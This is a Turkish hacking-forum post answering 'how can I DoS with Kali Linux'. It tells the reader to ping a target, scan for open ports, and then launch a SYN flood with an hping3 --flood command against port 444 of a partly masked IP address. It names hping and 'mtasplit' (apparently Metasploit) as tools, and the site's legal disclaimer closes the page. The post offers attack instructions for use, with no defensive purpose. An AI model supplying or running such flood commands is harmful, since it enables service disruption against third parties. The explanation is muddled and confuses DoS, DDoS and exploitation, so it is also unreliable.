Kali Linux İle Nasıl DOS Atabilirim ?

AhmedPasa

Üye
27 Nis 2019
146
0
Istanbul
Öncelikle Selamun Aleyküm Ddos salırısı yapman için öncelikle saldırı yapacağın ip adresinin ağ bağlantısı varmı bunu öğrenmek için ping atacaksın. Daha sonra açık portlar arayacaksın.
Örnek
Kod:
444/tcp  open  snpp
Bu porta saldırı yapman için internetten bu portun adını yazarak exploit yapan gerekecek çünkü saldırı kodunu bilmiyoruz ben araştırdım bu portun kodunu buldum.
Kod:
hping3 -S --flood -p 444 151.[COLOR="Red"]***[/COLOR].113.[COLOR="red"]***[/COLOR]
Ddos saldırısının birçok farklı yolları var bunlar hping,mtasplit

k9q7zJ.png

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.